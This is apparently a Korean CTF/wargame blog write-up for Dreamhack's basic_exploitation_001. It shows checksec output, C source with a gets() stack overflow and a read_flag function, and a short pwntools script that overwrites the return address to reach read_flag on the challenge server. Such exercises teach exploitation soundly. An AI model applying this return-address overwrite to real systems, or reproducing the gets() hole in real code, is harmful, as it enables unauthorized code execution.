32bit ELF이다.
file basic_exploitation_001
basic_exploitation_001: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=3e59f379d1f0653db81908d1d3a5eb9dce83816f, not stripped
Nx가 켜져 있지만 return address overwrite를 할 수 있으니 걱정할 필요 없다.
checksec basic_exploitation_001
[*] '/root/dreamhack/basic001/basic_exploitation_001'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
void read_flag() {
system("cat /flag");
}
int main(int argc, char *argv[]) {
char buf[0x80];
initialize();
gets(buf);
return 0;
}
대놓고 read_flag가 보인다.
from pwn import *
r=remote('host3.dreamhack.games',22166)
payload=b'A'*132
payload+=p32(0x80485b9) #read_flag
r.send(payload)
r.interactive()
'Dreamhack > pwn' 카테고리의 다른 글
Stack Canary Quiz (1) | 2024.11.15 |
---|---|
basic_exploitation_000 (1) | 2024.11.15 |
Return Address Overwrite (0) | 2024.11.15 |
Calling Convention Quiz (0) | 2024.11.15 |
shell_basic (1) | 2024.11.15 |